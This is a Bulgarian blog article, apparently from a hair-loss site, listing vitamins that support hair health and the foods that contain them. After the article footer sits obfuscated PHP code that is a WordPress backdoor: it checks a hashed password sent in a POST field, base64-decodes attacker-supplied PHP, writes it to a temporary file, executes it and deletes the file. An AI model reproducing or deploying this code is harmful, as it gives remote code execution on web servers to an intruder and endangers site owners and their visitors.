Най- важните витамини за косата ни | Косопад

Най- важните витамини за косата ни

kosa-krasiva

Витамин А – съдържа се в прясното мляко, рибата, черния дроб, яйцата, морковите, бадемите, маргарина, доматите и др. Поддържа здравето на скалпа, стимулира растежа му и прави косата силна. Но не трябва да прекалявате, защото обратният ефект е да причини косопад.

Витамин Е – подобрява растежа на косата, помага й да е силна, увеличава консумацията на кислород и подобрява кръвообращението. Предпазва ни от UVA лъчите. Съдържа се в ядките, зеленчуците, яйцата и зърнените храни.

Витамин В – представителите на тази група са най- важни за косата си, особено биотина и пантеноловата киселина. Яжте ядки, зеленчуци, яйца, пълнозърнести храни, плодове, червено месо и млечни продукти.

vegetarianstvo-dieta

Биотинът (витамин Н, В7 и В8) предпазва косата от косопад, като я прави по- еластична. Участва в производството на кератин, който предпазва косата от косопад. Сред богатите на биотин храни са бирена мая, яйца, ориз, прясно мляко, черен дроб, зърнени храни, соя, спанак, орехи и банани.

Фолиева киселина (витамин В9) поддържа естествения цвят на косата, тъй като въздейства върху меланина и предпазва от слънчевите лъчи. Ниските нива на фолиева киселина могат да причинят косопад. Богатите на витамина храни са леща, нахут, черен дроб, авокадо, пъпеш, банан, домат, спанак, грах, аспержи, портокали, някои зърнени храни.

Пантенолова киселина (витамин В5) предпазва от загуба на цвета на косата и от косопад. Може да си я набавите от млечни продукти, птиче месо, тиква, бирена мая, бадеми, слънчоглед и др.

Витамин С прави косата силна и здрава. Предпазва от късане и дехидратация. Съдържа се в ягоди, цитруси, пъпеш, зелени чушки, зелени зеленчуци и картофи.

30. януари 2015 11:04:25 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}